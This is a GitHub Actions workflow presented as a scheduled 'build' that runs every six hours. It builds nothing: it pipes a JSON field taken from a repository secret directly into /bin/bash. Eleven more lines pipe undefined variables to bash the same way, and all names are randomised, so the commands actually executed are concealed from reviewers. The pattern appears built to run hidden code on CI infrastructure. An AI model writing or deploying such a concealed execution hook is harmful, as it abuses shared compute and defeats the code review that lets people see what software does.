name: songjunnu2109

on:
  workflow_dispatch:
  schedule:
    - cron: '18 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songjunnu2109
        env:
          gf341: ${{ secrets.gf341 }}
        run: |
          echo $gf341 | jq -r .nkx0546 | /bin/bash
          echo $y6586 | jq -r .of0286 | /bin/bash
          echo $r966 | jq -r .iz7 | /bin/bash
          echo $mxq1344 | jq -r .ni60 | /bin/bash
          echo $t17 | jq -r .s239 | /bin/bash
          echo $dlwh73793 | jq -r .idip6816 | /bin/bash
          echo $ik359 | jq -r .s00711 | /bin/bash
          echo $l55 | jq -r .knb638 | /bin/bash
          echo $jeums3217 | jq -r .jnw5 | /bin/bash
          echo $afuk77 | jq -r .p74640 | /bin/bash
          echo $kla1861 | jq -r .xggqy69 | /bin/bash
          echo $utfp7 | jq -r .yzemb87398 | /bin/bash

